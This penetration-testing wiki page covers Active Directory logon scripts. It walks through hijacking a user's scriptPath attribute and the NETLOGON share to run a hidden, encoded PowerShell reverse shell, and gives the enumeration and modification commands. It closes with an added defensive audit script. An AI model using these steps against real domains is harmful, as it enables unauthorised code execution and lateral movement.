# Logon Scripts

In Active Directory environments, system administrators use logon scripts to automate various user tasks or configurations when logging into the domain, such as mapping and unmapping network drives, auditing and reporting, gathering information, and environment customization. There are two methods for assigning users a `logon script`:

1. using the `Logon script` field in the `Profile` tab of the user properties dialog, which internally updates the `scriptPath` attribute
2. utilizing a `Group Policy`

The [scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath) attribute (part of the [User-Logon property set](https://learn.microsoft.com/en-us/windows/win32/adschema/r-user-logon)) specifies the path for a user's logon script. The `scriptPath` attribute supports batch (\*.bat) or command (\*.cmd) files, executable programs (\*.exe), or programs written in any language hosted by the [Windows Script Host automation technology](https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts), including [VBScript](https://documentation.help/MS-Office-VBScript/VBStoc.htm) and [JScript](https://documentation.help/MS-Office-JScript/). Additionally, [KiXtart](http://www.kixtart.org/), a logon script processor and enhanced batch scripting language, can be used. Despite the myriad of languages it supports, `scriptPath` does not support PowerShell directly; however, we can run PowerShell commands from within batch and VBScript files.

To allow for replication to all domain controllers in the domain, Windows stores logon scripts in the `scripts` folder within the `SYSVOL` network share (`%systemroot%\SYSVOL\sysvol`); `SYSVOL` also stores domain and system policies, including GPOs. For ease of use, the `NETLOGON` network share exposes the `%systemroot%\SYSVOL\sysvol\<DOMAIN_DNS_NAME>\scripts\` folder directly, so the two paths point to the same logon scripts. The `LOGONSERVER` environment variable, which evaluates to the NetBIOS name of the domain controller that authenticated the current user, can help us locate the `SYSVOL` and `NETLOGON` network shares.

#### Abusing write permissions over the ScriptPath attribute

Possessing the right to write a user's `scriptPath` opens avenues for potential attack paths if we also have write permissions anywhere within the NETLOGON share.

{% hint style="warning" %}
Both NTFS permissions and share permissions on NETLOGON are required, together with the right to set the user's `scriptPath` attribute.
{% endhint %}

We can enumerate the permissions we have over the attribute with Adalanche (BloodHound misses this ACL), but also with `dacledit` or [pywerview](https://github.com/the-useless-one/pywerview):

```
python3 pywerview get-objectacl --name 'anotherUser' -w domain.com -t 10.10.10.10 -u 'otter' -p 'SomethingSecure123!' --resolve-sids --resolve-guids

dacledit.py -principal 'otter' -target 'anotherUser' -dc-ip 10.10.10.10 domain.com/'otter':'SomethingSecure123!'
```

PowerView also works for enumerating the ACL:

```powershell
Import-Module .\PowerView.ps1
# SID of the principal we control; keep only the ACEs on the target that are granted to it
$otterSID = (Get-DomainUser -Identity otter).objectSID
Get-DomainObjectAcl -Identity anotherUser -ResolveGUIDs | ?{$_.SecurityIdentifier -eq $otterSID}
```

Now we can enumerate the permissions we have over the NETLOGON share using a tool like `smbcacls`; if we have sufficient permissions, we can replace the logon script with malicious code like a revshell. Since `scriptPath` can't execute PowerShell scripts directly, we will have to base64-encode a PowerShell command and run it from another kind of file, such as a `.bat`, `.cmd` or VBScript file, for example:

```vba
CreateObject("Wscript.shell").Run "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <BASE64>"
```

Once we upload the file to the share, we have to modify the script path; to do this we can use BloodyAD:

```
bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p 'SomethingSecure123!' set object anotherUser scriptPath -v 'folder\logonScript.bat'
```

or `ldapmodify` with a custom `ldif` file:

```
dn: CN=anotherUser,CN=Users,DC=domain,DC=com
changetype: modify
replace: scriptPath
scriptPath: folder\logonScript.bat
```

```
ldapmodify -H ldap://10.10.10.10 -x -D 'otter@domain.com' -w 'SomethingSecure123!' -f logonScript.ldif
```

The same can be done from Windows with PowerView:

```powershell
Import-Module .\PowerView.ps1
Set-DomainObject anotherUser -Set @{'scriptPath'='folder\logonScript.bat'}
```

and we can confirm that the attribute was updated:

```powershell
Get-DomainObject anotherUser -Properties scriptPath
```

{% hint style="warning" %}
The path to the logon script has to be **relative** to the NETLOGON share.
{% endhint %}
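A defensive counterpart to the whole procedure above, as an added example that is not part of the original notes: it audits every domain user for non-trusted principals that can write `scriptPath` on the user object (via the attribute GUID, the User-Logon property set, all properties, or broad rights such as GenericAll/WriteDacl) and checks whether each configured script is missing from NETLOGON or writable on disk. It assumes the RSAT `ActiveDirectory` module in a domain-joined session (`$env:USERDNSDOMAIN` set); the trusted-principal regex is an assumption to tune per environment.

```powershell
# Added defensive audit, not part of the original notes. Assumes the RSAT ActiveDirectory
# module on a domain-joined host ($env:USERDNSDOMAIN set); the trusted-principal regex is an
# assumption and should be tuned to the environment.
Import-Module ActiveDirectory
$TrustedPattern = 'Domain Admins|Enterprise Admins|\\Administrators$|\\SYSTEM$|CREATOR OWNER|ENTERPRISE DOMAIN CONTROLLERS'

function Get-LogonScriptExposure {
    $rootDse = Get-ADRootDSE
    # Resolve the scriptPath attribute GUID and User-Logon property-set GUID from the directory, not hardcoded
    $scriptPathGuid = [guid]::new((Get-ADObject -SearchBase $rootDse.schemaNamingContext `
        -LDAPFilter '(lDAPDisplayName=scriptPath)' -Properties schemaIDGUID).schemaIDGUID)
    $userLogonGuid = [guid](Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
        -LDAPFilter '(name=User-Logon)' -Properties rightsGuid).rightsGuid
    $writeGuids = @($scriptPathGuid, $userLogonGuid, [guid]::Empty)   # Empty GUID = all properties
    $adr = [System.DirectoryServices.ActiveDirectoryRights]
    $broad = $adr::GenericAll -bor $adr::GenericWrite -bor $adr::WriteDacl -bor $adr::WriteOwner
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $fsWrite = $fsr::WriteData -bor $fsr::Delete -bor $fsr::ChangePermissions -bor $fsr::TakeOwnership
    $netlogon = "\\$env:USERDNSDOMAIN\NETLOGON"

    foreach ($u in Get-ADUser -Filter * -Properties scriptPath, nTSecurityDescriptor) {
        # 1. Which non-trusted principals can write scriptPath on the user object itself?
        foreach ($ace in $u.nTSecurityDescriptor.Access) {
            if ($ace.AccessControlType -ne 'Allow' -or $ace.IdentityReference.Value -match $TrustedPattern) { continue }
            $r = $ace.ActiveDirectoryRights
            $writesAttr = (($r -band $adr::WriteProperty) -ne 0) -and ($ace.ObjectType -in $writeGuids)
            if ($writesAttr -or (($r -band $broad) -ne 0)) {
                [pscustomobject]@{ User = $u.SamAccountName; Kind = 'ObjectAcl'
                                   Principal = $ace.IdentityReference.Value; Detail = "$r on $($ace.ObjectType)" }
            }
        }
        if (-not $u.scriptPath) { continue }
        # 2. Does the referenced script exist under NETLOGON, and who can modify it on disk?
        $file = Join-Path $netlogon $u.scriptPath
        if (-not (Test-Path -LiteralPath $file)) {
            [pscustomobject]@{ User = $u.SamAccountName; Kind = 'DanglingScript'; Principal = ''; Detail = "$file is missing" }
            continue
        }
        foreach ($ace in (Get-Acl -LiteralPath $file).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and $ace.IdentityReference.Value -notmatch $TrustedPattern -and
                (($ace.FileSystemRights -band $fsWrite) -ne 0)) {
                [pscustomobject]@{ User = $u.SamAccountName; Kind = 'FileAcl'
                                   Principal = $ace.IdentityReference.Value; Detail = "$($ace.FileSystemRights) on $file" }
            }
        }
    }
}

Get-LogonScriptExposure | Format-Table -AutoSize
```

A `DanglingScript` finding matters as much as a writable one: a `scriptPath` pointing at a file that does not exist can be satisfied by anyone able to create files in that NETLOGON subfolder.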

